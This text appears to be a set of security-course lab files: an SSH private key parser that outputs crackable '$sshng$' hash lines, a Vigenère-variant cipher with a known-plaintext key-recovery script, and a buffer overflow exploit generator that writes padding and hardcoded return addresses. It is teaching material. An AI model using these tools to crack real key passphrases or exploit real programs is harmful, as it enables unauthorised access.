'AES-128-CBC': {'cipher': AES, 'keysize': 16, 'blocksize': 16, 'mode': AES.MODE_CBC},
'DES-EDE3-CBC': {'cipher': DES3, 'keysize': 24, 'blocksize': 8, 'mode': DES3.MODE_CBC},
'AES-256-CBC': {'cipher': AES, 'keysize': 32, 'blocksize': 16, 'mode': AES.MODE_CBC},
}
def __init__(self, msg=None, data=None):
"""
Create a new instance of this public key type. If C{msg} is given,
the key's public part(s) will be filled in from the message. If
C{data} is given, the key's public part(s) will be filled in from
the string.
@param msg: an optional SSH L{Message} containing a public key of this
type.
@type msg: L{Message}
@param data: an optional string containing a public key of this type
@type data: str
@raise SSHException: if a key cannot be created from the C{data} or
C{msg} given, or no key was passed in.
"""
pass
def __str__(self):
"""
Return a string of an SSH L{Message} made up of the public part(s) of
this key. This string is suitable for passing to L{__init__} to
re-create the key object later.
@return: string representation of an SSH key message.
@rtype: str
"""
return ''
def __cmp__(self, other):
"""
Compare this key to another. Returns 0 if this key is equivalent to
the given key, or non-0 if they are different. Only the public parts
of the key are compared, so a public key will compare equal to its
corresponding private key.
@param other: key to compare to.
@type other: L{PKey}
@return: 0 if the two keys are equivalent, non-0 otherwise.
@rtype: int
"""
hs = hash(self)
ho = hash(other)
if hs != ho:
return cmp(hs, ho)
return cmp(str(self), str(other))
def get_name(self):
"""
Return the name of this private key implementation.
@return: name of this private key type, in SSH terminology (for
example, C{"ssh-rsa"}).
@rtype: str
"""
return ''
def get_bits(self):
"""
Return the number of significant bits in this key. This is useful
for judging the relative security of a key.
@return: bits in the key.
@rtype: int
"""
return 0
def can_sign(self):
"""
Return C{True} if this key has the private part necessary for signing
data.
@return: C{True} if this is a private key.
@rtype: bool
"""
return False
def get_fingerprint(self):
"""
Return an MD5 fingerprint of the public part of this key. Nothing
secret is revealed.
@return: a 16-byte string (binary) of the MD5 fingerprint, in SSH
format.
@rtype: str
"""
return MD5.new(str(self)).digest()
def get_base64(self):
"""
Return a base64 string containing the public part of this key. Nothing
secret is revealed. This format is compatible with that used to store
public key files or recognized host keys.
@return: a base64 string containing the public part of the key.
@rtype: str
"""
return base64.encodestring(str(self)).replace('\n', '')
def sign_ssh_data(self, rng, data):
"""
Sign a blob of data with this private key, and return a L{Message}
representing an SSH signature message.
@param rng: a secure random number generator.
@type rng: L{Crypto.Util.rng.RandomPool}
@param data: the data to sign.
@type data: str
@return: an SSH signature message.
@rtype: L{Message}
"""
return ''
def verify_ssh_sig(self, data, msg):
"""
Given a blob of data, and an SSH message representing a signature of
that data, verify that it was signed with this key.
@param data: the data that was signed.
@type data: str
@param msg: an SSH signature message
@type msg: L{Message}
@return: C{True} if the signature verifies correctly; C{False}
otherwise.
@rtype: boolean
"""
return False
def from_private_key_file(cls, filename, password=None):
"""
Create a key object by reading a private key file. If the private
key is encrypted and C{password} is not C{None}, the given password
will be used to decrypt the key (otherwise L{PasswordRequiredException}
is thrown). Through the magic of python, this factory method will
exist in all subclasses of PKey (such as L{RSAKey} or L{DSSKey}), but
is useless on the abstract PKey class.
@param filename: name of the file to read
@type filename: str
@param password: an optional password to use to decrypt the key file,
if it's encrypted
@type password: str
@return: a new key object based on the given private key
@rtype: L{PKey}
@raise IOError: if there was an error reading the file
@raise PasswordRequiredException: if the private key file is
encrypted, and C{password} is C{None}
@raise SSHException: if the key file is invalid
"""
key = cls(filename=filename, password=password)
return key
from_private_key_file = classmethod(from_private_key_file)
def from_private_key(cls, file_obj, password=None):
"""
Create a key object by reading a private key from a file (or file-like)
object. If the private key is encrypted and C{password} is not C{None},
the given password will be used to decrypt the key (otherwise
L{PasswordRequiredException} is thrown).
@param file_obj: the file to read from
@type file_obj: file
@param password: an optional password to use to decrypt the key, if it's
encrypted
@type password: str
@return: a new key object based on the given private key
@rtype: L{PKey}
@raise IOError: if there was an error reading the key
@raise PasswordRequiredException: if the private key file is encrypted,
and C{password} is C{None}
@raise SSHException: if the key file is invalid
"""
key = cls(file_obj=file_obj, password=password)
return key
from_private_key = classmethod(from_private_key)
def _read_private_key_file(self, tag, filename, password=None):
"""
Read an SSH2-format private key file, looking for a string of the type
C{"BEGIN xxx PRIVATE KEY"} for some C{xxx}, base64-decode the text we
find, and return it as a string. If the private key is encrypted and
C{password} is not C{None}, the given password will be used to decrypt
the key (otherwise L{PasswordRequiredException} is thrown).
@param tag: C{"RSA"} or C{"DSA"}, the tag used to mark the data block.
@type tag: str
@param filename: name of the file to read.
@type filename: str
@param password: an optional password to use to decrypt the key file,
if it's encrypted.
@type password: str
@return: data blob that makes up the private key.
@rtype: str
@raise IOError: if there was an error reading the file.
@raise PasswordRequiredException: if the private key file is
encrypted, and C{password} is C{None}.
@raise SSHException: if the key file is invalid.
"""
try:
f = open(filename, 'r')
except IOError:
e = sys.exc_info()[1]
sys.stdout.write("%s\n" % str(e))
return
data = self._read_private_key(tag, f, password)
f.close()
return data
def _read_private_key(self, tag, f, password=None):
lines = f.readlines()
if "BEGIN RSA PRIVATE" in lines[0]:
tag = "RSA"
self.type = 0
elif "-----BEGIN OPENSSH PRIVATE KEY-----" in lines[0]:
self.type = 2 # bcrypt pbkdf + aes-256-cbc
else:
self.type = 1
tag = "DSA"
start = 0
while (start < len(lines)) and ((lines[start].strip() != '-----BEGIN ' + tag + ' PRIVATE KEY-----') and (lines[start].strip() != '-----BEGIN OPENSSH PRIVATE KEY-----')):
start += 1
if start >= len(lines):
sys.stdout.write("%s is not a valid private key file\n" % f.name)
return None
# parse any headers first
headers = {}
start += 1
while start < len(lines):
l = lines[start].split(': ')
if len(l) == 1:
break
headers[l[0].lower()] = l[1].strip()
start += 1
# find end
end = start
        while (end < len(lines)) and (lines[end].strip() != '-----END OPENSSH PRIVATE KEY-----') and (lines[end].strip() != '-----END ' + tag + ' PRIVATE KEY-----'):
end += 1
# if we trudged to the end of the file, just try to cope.
try:
data = ''.join(lines[start:end]).encode()
            data = base64.b64decode(data)
except base64.binascii.Error:
e = sys.exc_info()[1]
raise SSHException('base64 decoding error: ' + str(e))
if 'proc-type' not in headers and self.type != 2:
            # unencrypted: done
sys.stderr.write("%s has no password!\n" % f.name)
return None
# encrypted keyfile: will need a password
        if self.type != 2 and headers['proc-type'] != '4,ENCRYPTED':
raise SSHException('Unknown private key structure "%s"' % headers['proc-type'])
try:
encryption_type, saltstr = headers['dek-info'].split(',')
except:
if self.type != 2:
raise SSHException('Can\'t parse DEK-info in private key file')
else:
encryption_type = "AES-256-CBC"
saltstr = "fefe"
if encryption_type not in self._CIPHER_TABLE:
raise SSHException('Unknown private key cipher "%s"' % encryption_type)
# if no password was passed in, raise an exception pointing out that we need one
if password is None:
raise PasswordRequiredException('Private key file is encrypted')
cipher = self._CIPHER_TABLE[encryption_type]['cipher']
keysize = self._CIPHER_TABLE[encryption_type]['keysize']
        mode = self._CIPHER_TABLE[encryption_type]['mode']
        salt = unhexlify(saltstr)
if self.type == 2:
salt_offset = 47 # XXX is this fixed?
salt_length = 16
            saltstr = binascii.hexlify(data[salt_offset:salt_offset + salt_length]).decode("ascii")
data = binascii.hexlify(data).decode("ascii")
if keysize == 24:
self.hashline = "%s:$sshng$%s$%s$%s$%s$%s" % (f.name, 0,
len(salt), saltstr, len(data) // 2, data)
elif keysize == 16:
self.hashline = "%s:$sshng$%s$%s$%s$%s$%s" % (f.name, 1, len(saltstr) // 2,
saltstr, len(data) // 2, data)
elif keysize == 32 and self.type == 2: # bcrypt pbkdf + aes-256-cbc
# round value appears after salt
rounds = 16
self.hashline = "%s:$sshng$%s$%s$%s$%s$%s$%d" % (f.name, 2, len(saltstr) // 2,
saltstr, len(data) // 2, data, rounds)
else:
sys.stderr.write("%s uses unsupported cipher, please file a bug!\n" % f.name)
return None
if not limited:
key = generate_key_bytes(MD5, salt, password, keysize)
data = cipher.new(key, mode, salt).decrypt(data)
# check encoding
try:
d = PKCS7Encoder()
ddata = d.decode(data)
return ddata
except ValueError: # incorrect password
return data
return self.hashline # dummy value
def chunks(l, n):
    for i in range(0, len(l), n):
yield l[i:i + n]
class RSADSSKey (PKey):
def __init__(self, msg=None, data=None, filename=None, password=None, vals=None, file_obj=None):
self.n = None
self.e = None
self.d = None
self.p = None
self.q = None
if file_obj is not None:
self._from_private_key(file_obj, password)
return
if filename is not None:
self._from_private_key_file(filename, password)
return
if vals is not None:
self.e, self.n = vals
self.size = bit_length(self.n)
def __hash__(self):
h = hash(self.get_name())
h = h * 37 + hash(self.e)
h = h * 37 + hash(self.n)
return hash(h)
def get_name(self):
return 'ssh-rsa'
def get_bits(self):
return self.size
### internals...
def _from_private_key_file(self, filename, password):
data = self._read_private_key_file('RSA', filename, password)
if not data:
return
if limited:
sys.stdout.write("%s\n" % self.hashline)
return
try:
if self.type == 0:
self._decode_key(data)
else:
self._decode_dss_key(data)
sys.stderr.write("%s has no password!\n" % filename)
except SSHException:
sys.stdout.write("%s\n" % self.hashline)
def _from_private_key(self, file_obj, password):
"""used for converting older format hashes"""
data = self._read_private_key('RSA', file_obj, password)
if limited:
sys.stdout.write("%s\n" % self.hashline)
return
try:
if self.type == 0:
self._decode_key(data)
else:
self._decode_dss_key(data)
sys.stderr.write("%s has no password!\n" % file_obj.name)
except SSHException:
sys.stdout.write("%s\n" % self.hashline)
def _decode_key(self, data):
# private key file contains:
# RSAPrivateKey = { version = 0, n, e, d, p, q, d mod p-1, d mod q-1, q**-1 mod p }
try:
keylist = BER(data).decode()
except BERException:
raise SSHException('Unable to parse key file')
if (type(keylist) is not list) or (len(keylist) < 4) or (keylist[0] != 0):
raise SSHException('Not a valid RSA private key file (bad ber encoding)')
self.n = keylist[1]
self.e = keylist[2]
self.d = keylist[3]
# not really needed
self.p = keylist[4]
self.q = keylist[5]
self.size = bit_length(self.n)
def _decode_dss_key(self, data):
# private key file contains:
# DSAPrivateKey = { version = 0, p, q, g, y, x }
try:
keylist = BER(data).decode()
except BERException:
e = sys.exc_info()[1]
raise SSHException('Unable to parse key file: ' + str(e))
if (type(keylist) is not list) or (len(keylist) < 6) or \
(keylist[0] != 0):
raise SSHException('not a valid DSA private key file (bad ber encoding)')
self.p = keylist[1]
self.q = keylist[2]
self.g = keylist[3]
self.y = keylist[4]
self.x = keylist[5]
self.size = bit_length(self.p)
# PKCS7Encoder is borrowed from http://japrogbits.blogspot.in/
class PKCS7Encoder(object):
'''
RFC 2315: PKCS#7 page 21
Some content-encryption algorithms assume the
input length is a multiple of k octets, where k > 1, and
let the application define a method for handling inputs
whose lengths are not a multiple of k octets. For such
algorithms, the method shall be to pad the input at the
trailing end with k - (l mod k) octets all having value k -
(l mod k), where l is the length of the input. In other
words, the input is padded at the trailing end with one of
the following strings:
01 -- if l mod k = k-1
02 02 -- if l mod k = k-2
.
.
.
k k ... k k -- if l mod k = 0
The padding can be removed unambiguously since all input is
padded and no padding string is a suffix of another. This
padding method is well-defined if and only if k < 256;
methods for larger k are an open issue for further study.
'''
def __init__(self, k=16):
self.k = k
## @param text The padded text for which the padding is to be removed.
# @exception ValueError Raised when the input padding is missing or corrupt.
def decode(self, text):
'''
Remove the PKCS#7 padding from a text string
'''
nl = len(text)
val = int(binascii.hexlify(text[-1]), 16)
if val > self.k:
raise ValueError('Input is not padded or padding is corrupt')
l = nl - val
return text[:l]
## @param text The text to encode.
def encode(self, text):
'''
Pad an input string according to PKCS#7
'''
l = len(text)
output = StringIO()
val = self.k - (l % self.k)
        for _ in range(val):
output.write('%02x' % val)
return text + binascii.unhexlify(output.getvalue())
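# Worked example of the padding rule documented above (assuming k = 16):
# a 13-byte input needs 16 - (13 % 16) = 3 bytes of padding, each holding the
# value 0x03; decode() then reads the final byte (3) and strips that many
# trailing bytes, recovering the original 13-byte input.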
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.stdout.write("Usage: %s < RSA/DSA private key files >\n" % \
sys.argv[0])
for filename in sys.argv[1:]:
key = RSADSSKey.from_private_key_file(filename, '')
```
#### File: lab1/part1/vigenere.py
```python
__all__ = ["vigenere_encrypt", "vigenere_decrypt"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import argparse
import struct
from itertools import cycle
# --------------------------------- MODULES -----------------------------------
# ---------------------------- GLOBAL CONSTANTS -------------------------------
# Match mapping indexes to fit the range for plaintext and key characters
MAPPING = (
(0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe),
(0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0),
(0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7),
(0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa),
(0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4),
(0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3),
(0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1),
(0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf),
(0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2),
(0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5),
(0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb),
(0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6),
(0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8),
(0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9),
(0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd),
(0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc)
)
# The first index is the column index in the 'mapping';
# the second index is actual cipher byte resides in the 'mapping'.
# To find the row index after knowing column index and cipher byte:
# inverted_mapping[column][cipher_byte]
INVERTED_MAPPING = {key: dict() for key in range(len(MAPPING[0]))}
# ---------------------------- GLOBAL CONSTANTS -------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def vigenere_encrypt(output_file_name: str, input_file_name: str, key: str):
"""
Encrypts the file with 'input_file_name' with the given full 'key' and
writes the output to file with 'output_file_name'.
"""
with open(output_file_name, "wb") as output_file:
for byte in map(_byte_encrypt, bytes_get(input_file_name), cycle(key)):
output_file.write(byte)
def vigenere_decrypt(output_file_name: str, input_file_name: str, key: str):
"""
Decrypts the file with 'input_file_name' with the given full 'key' and
writes the output to file with 'output_file_name'.
"""
with open(output_file_name, "wb") as output_file:
for byte in map(_byte_decrypt, bytes_get(input_file_name), cycle(key)):
output_file.write(byte)
def _byte_encrypt(clear_text_byte: int, subkey: str) -> bytes:
"""
Encrypts the given 'clear_text_byte' with the 'subkey' specified using
one variant of the Vigenère cipher.
NOTE: The 'subkey' is a single character of the whole Vigenère key;
for example, 'c' is the first subkey of the key 'cipher'.
It is the caller's responsibility to pass the correct 'subkey' for a given
'clear_text_byte' and ensures the "wrap-around" behavior of 'subkey'.
"""
# if not all(isinstance(arg, int) for arg in locals().values()):
# raise TypeError("'clear_text_byte' must be of 'int' type")
if not isinstance(clear_text_byte, int):
raise TypeError("'clear_text_byte' must be of 'int' type")
if clear_text_byte not in range(1 << 8):
raise ValueError("'clear_text_byte' must be in range [0, 1 << 8)")
if not isinstance(subkey, str):
raise TypeError("'subkey' must be of 'str' type")
if 1 != len(subkey):
raise ValueError("'subkey' must be a single character 'str' type")
subkey_value = ord(subkey)
high_mask = 0b11110000
low_mask = high_mask >> 4
plain_high = (clear_text_byte & high_mask) >> 4
plain_low = clear_text_byte & low_mask
subkey_high = (subkey_value & high_mask) >> 4
subkey_low = subkey_value & low_mask
cipher_high = MAPPING[plain_high][subkey_low] << 4
cipher_low = MAPPING[plain_low][subkey_high]
# To convert an 'int' to a 'bytes' object properly in python 3,
# use the call pattern of bytes([0x9a])
cipher_byte = bytes([cipher_high | cipher_low])
return cipher_byte
def _byte_decrypt(cipher_text_byte: int, subkey: str) -> bytes:
"""
Decrypts the given 'cipher_text_byte' with the 'subkey' specified using
one variant of the Vigenère cipher.
NOTE: The 'subkey' is a single character of the whole Vigenère key;
for example, 'c' is the first subkey of the key 'cipher'.
It is the caller's responsibility to pass the correct 'subkey' for a given
'cipher_text_byte' and ensures the "wrap-around" behavior of 'subkey'.
"""
if not isinstance(cipher_text_byte, int):
raise TypeError("'cipher_text_byte' must be of 'int' type")
if cipher_text_byte not in range(1 << 8):
raise ValueError("'cipher_text_byte' must be in range [0, 1 << 8)")
if not isinstance(subkey, str):
raise TypeError("'subkey' must be of 'str' type")
if 1 != len(subkey):
raise ValueError("'subkey' must be a single character 'str' type")
subkey_value = ord(subkey)
high_mask = 0b11110000
low_mask = high_mask >> 4
cipher_high = (cipher_text_byte & high_mask) >> 4
cipher_low = cipher_text_byte & low_mask
subkey_high = (subkey_value & high_mask) >> 4
subkey_low = subkey_value & low_mask
plain_high = INVERTED_MAPPING[subkey_low][cipher_high] << 4
plain_low = INVERTED_MAPPING[subkey_high][cipher_low]
plain_byte = bytes([plain_high | plain_low])
return plain_byte
def bytes_get(file_name: str):
"""
Returns a generator that gets one byte of the given 'file_name'
at a time.
"""
if not isinstance(file_name, str):
raise TypeError("'file_name' argument must be of 'str' type")
with open(file_name, "rb") as input_file:
while True:
# Read a single byte at a time
byte = input_file.read(1)
if not byte:
break
yield struct.unpack("B", byte)[0]
# NOTE: the following only works in python version >= 3.5
# yield int(byte.hex(), base=16)
def main():
"""
Main command-line driver.
"""
cli_description = "Encrypt/decrypt a file with the Vigenère cipher"
parser = argparse.ArgumentParser(description=cli_description)
group = parser.add_mutually_exclusive_group()
parser.add_argument("file",
type=str,
nargs="?",
help="file to be encrypted/decrypted")
group.add_argument("-d",
"--decrypt",
type=str,
required=False,
help="file name of the decrypted output")
group.add_argument("-e",
"--encrypt",
type=str,
required=False,
help="file name of the encrypted output")
parser.add_argument("-k",
"--key",
type=str,
required=True,
help="key to encrypt/decrypt the Vigenère variant")
args = parser.parse_args()
if args.decrypt:
print("Decrypted output is " + args.decrypt)
vigenere_decrypt(args.decrypt, args.file, args.key)
elif args.encrypt:
print("Encrypted output is " + args.encrypt)
vigenere_encrypt(args.encrypt, args.file, args.key)
# List all the non-private attributes
# for attr in filter(lambda attr: not attr.startswith("_"), dir(args)):
# if getattr(args, attr):
# print(getattr(args, attr))
if __name__ == "__main__":
for column in range(len(MAPPING[0])):
for row in range(len(MAPPING)):
INVERTED_MAPPING[column][MAPPING[row][column]] = row
main()
# -------------------------------- FUNCTIONS ----------------------------------
```
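A minimal round-trip sketch using the two public functions above. The module name and file names are assumptions; note that the module only populates `INVERTED_MAPPING` under its `__main__` guard, so an importing caller has to build the inverse table before decrypting.
```python
from vigenere import MAPPING, INVERTED_MAPPING, vigenere_encrypt, vigenere_decrypt

# Build the inverse table, mirroring the module's own __main__ block.
for column in range(len(MAPPING[0])):
    for row in range(len(MAPPING)):
        INVERTED_MAPPING[column][MAPPING[row][column]] = row

vigenere_encrypt("secret.bin", "plain.txt", "cipher")    # (output, input, key)
vigenere_decrypt("restored.txt", "secret.bin", "cipher")

with open("plain.txt", "rb") as original, open("restored.txt", "rb") as restored:
    assert original.read() == restored.read()
```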
#### File: lab1/part2/part2.1.py
```python
import sys
# mapping used for Lab 1
# NOTE 'map' identifier is a builtin function of python3
mapping = [
[0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe],
[0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0],
[0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7],
[0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa],
[0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4],
[0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3],
[0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1],
[0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf],
[0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2],
[0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5],
[0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb],
[0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6],
[0x9, 0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8],
[0xd, 0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9],
[0xc, 0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd],
[0xe, 0xf, 0x7, 0x6, 0x4, 0x5, 0x1, 0x0, 0x2, 0x3, 0xb, 0xa, 0x8, 0x9, 0xd, 0xc]
]
# Dictionary with keys of file type extension and values of tuples
# in the format of:
# (number of bytes to read from the offset 0 of files, matching bytes pattern)
SIGNATURE_TABLE = {
# Compound File Binary Format - doc, xls, ppt
"doc": (8, bytes([0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1])),
# Zip File Format - zip, docx, xlsx, pptx
"docx": (2, bytes([0x50, 0x4B])),
# PDF Document - pdf
"pdf": (4, bytes([0x25, 0x50, 0x44, 0x46])),
# PostScript Document - ps
"ps": (4, bytes([0x25, 0x21, 0x50, 0x53])),
    # Bytes 4 and 5 of the JPEG/Exif signature vary in practice; they are listed as 0x00 here and compared literally below
"jpg": (11, bytes([0xFF, 0xD8, 0xFF, 0xE1, 0x00, 0x00, 0x45, 0x78, 0x69, 0x66, 0x00]))
}
# Largest amount of bytes to read based on the given signatures
MAX_BYTES_TO_READ = 11
# Used for storing possible keys for various file signatures in SIGNATURE_TABLE
KEY_TABLE = {}
# Key for ciphertext2
KEY_BYTES = bytes([0x35, 0x33, 0x2E, 0x35, 0x30, 0x33, 0x35, 0x36, 0x33, 0x4E, 0x2C, 0x2D, 0x31, 0x31, 0x33, 0x2E, 0x35, 0x32, 0x38, 0x38, 0x39, 0x34, 0x57])
KEY_LENGTH = 23
# Key is any combination of printable characters 0x20 to 0x7F
#
# Key higher bit value must be 2,3,4,5,6 or 7
#
# Plaintext characters from ASCII hex values range from 0x00 to 0x7F
#
# Plaintext higher bit value must be 0,1,2,3,4,5,6 or 7
#
# ph <- higher 4 bits of plaintext
# pl <- lower 4 bits of plaintext
#
# kh <- higher 4 bits of key
# kl <- lower 4 bits of key
#
# ch <- mapping[ph][kl]
# cl <- mapping[pl][kh]
# c <- 0x(ch)(cl)
#
#
# Match mapping indexes to fit the range for plaintext and key characters
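# Worked example with the table above: encrypting the plaintext byte 0x41 ('A')
# with the key byte 0x63 ('c') gives ph = 0x4, pl = 0x1, kh = 0x6, kl = 0x3, so
# ch = mapping[0x4][0x3] = 0x2 and cl = mapping[0x1][0x6] = 0xd, i.e. the
# ciphertext byte is 0x2d. Decryption scans column kl for ch to recover ph and
# column kh for cl to recover pl, which is what plaintextByte() below does.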
def plaintextByte(mapping, ch, cl, kh, kl):
"""
This method converts a given ch and cl, into a ph and pl with using a kh and kl.
Returns the plaintext byte.
"""
for i, x in enumerate(mapping):
for j, y in enumerate(x):
if (j == kh) and (j == kl) and (mapping[i][kh] == cl) and (mapping[i][kl] == ch):
pl = i
ph = i
elif (j == kh) and (mapping[i][kh] == cl):
pl = i
elif (j == kl) and (mapping[i][kl] == ch):
ph = i
return ((ph << 4) + pl)
def getKeyFromPlainAndCipher(mapping, ph, pl, ch, cl):
"""
Given a known plaintext byte and known ciphertext byte, find the key byte.
"""
for i, x in enumerate(mapping):
for j, y in enumerate(x):
if (i == ph) and (mapping[ph][j] == ch):
kl = j
if (i == pl) and (mapping[pl][j] == cl):
kh = j
return ((kh << 4) + kl)
def checkFileHeader():
"""
This method will check all of the given file headers in SIGNATURE_TABLE and
add to KEY_TABLE what the start of the key would have to be to decrypt to a
certain header.
"""
# Get the header of the file
cFile = open(sys.argv[1], "rb")
encHeader = cFile.read(MAX_BYTES_TO_READ)
cFile.close()
print("Checking against hard coded signatures...")
for fileType, infoTuple in SIGNATURE_TABLE.items():
keylst = []
bytesToExam, matchBytes = infoTuple
        for i in range(bytesToExam):
cByte = encHeader[i]
ch = cByte >> 4
cl = cByte & 15
pByte = matchBytes[i]
ph = pByte >> 4
pl = pByte & 15
k = getKeyFromPlainAndCipher(mapping, ph, pl, ch, cl)
keylst.append(k)
sys.stdout.write("{0}: ".format(fileType))
first = True
for byte in keylst:
if first:
sys.stdout.write("[{0}".format(format(byte, '02x')))
first = False
else:
sys.stdout.write(", {0}".format(format(byte, '02x')))
sys.stdout.write("]\n")
KEY_TABLE[fileType] = (bytesToExam, keylst)
print("All signatures checked!")
def decrypt():
"""
This method decrypts the given ciphertext file using the hardcoded key.
"""
print("Starting decryption with hardcoded key...")
cipherfn = sys.argv[1]
plainfn = sys.argv[2]
pfile = open(plainfn, "wb")
with open(cipherfn, "rb") as cipherfile:
i = 0
while True:
byte = cipherfile.read(1)
if not byte:
break
int_byte = ord(byte)
ch = int_byte >> 4
cl = int_byte & 15
k = KEY_BYTES[i]
kh = k >> 4
kl = k & 15
p = plaintextByte(mapping, ch, cl, kh, kl)
pfile.write(bytes([p]))
i += 1
if i == KEY_LENGTH:
i = 0
pfile.close()
print("Decryption finished!")
return
def main():
if len(sys.argv) == 1:
print("No cipherfile input added")
sys.exit(2)
if len(sys.argv) == 2:
print("No output file added")
sys.exit(2)
checkFileHeader()
decrypt()
return
if __name__ == "__main__":
main()
```
#### File: lab3/part2/exploit.py
```python
__all__ = ["buffer_exploit"]
# ------------------------------- MODULE INFO ---------------------------------
# --------------------------------- MODULES -----------------------------------
import argparse
import shutil
import signal
import subprocess
# --------------------------------- MODULES -----------------------------------
# ------------------------------ TYPE ALIASES ---------------------------------
# ------------------------------ TYPE ALIASES ---------------------------------
# -------------------------------- FUNCTIONS ----------------------------------
def buffer_exploit(program: str, output: str):
"""
Find the minimum number of letters that can cause a buffer overflow and
write the appropriate attack byte content into a file named 'output'.
"""
if not all(isinstance(arg, str) for arg in (program, output)):
raise TypeError("'program' and 'output' must be of 'str' type")
if not shutil.which(program):
raise ValueError("The given 'program' is not found")
buffer_size = None
buffer_found = False
high = 1
padding_byte = b"0"
secret_byte = b"\x24\x82\x04\x08"
exit_byte = b"\xfc\x0d\x05\x08"
low = None
high_found = False
output_info = "The minimum number of letters that caused overflow is: {0}"
while not high_found:
with subprocess.Popen([program], stdin=subprocess.PIPE) as proc:
proc.communicate(padding_byte * high)
# iteratively double 'high' as long as no 'SIGSEGV' signal
# is delivered
if proc.returncode == -signal.SIGSEGV:
high_found = True
else:
high *= 2
low = high // 2
buffer_size = (low + high) // 2
while not buffer_found:
with subprocess.Popen([program], stdin=subprocess.PIPE) as proc1:
proc1.communicate(padding_byte * buffer_size)
# if the program crashes with SIGSEGV signal
if proc1.returncode == -signal.SIGSEGV:
# need to test whether buffer_size - 1 still cause a crash
with subprocess.Popen([program], stdin=subprocess.PIPE) as proc2:
proc2.communicate(padding_byte * (buffer_size - 1))
# if it still crashes, set 'high' to be 'buffer_size'
if proc2.returncode == -signal.SIGSEGV:
high = buffer_size - 1
# otherwise we have found the minimum 'buffer_size' that
# cause a crash
else:
buffer_found = True
else:
low = buffer_size + 1
buffer_size = (low + high) // 2
print(output_info.format(buffer_size))
with open(output, "wb") as dump:
dump.write(padding_byte * buffer_size + secret_byte + exit_byte)
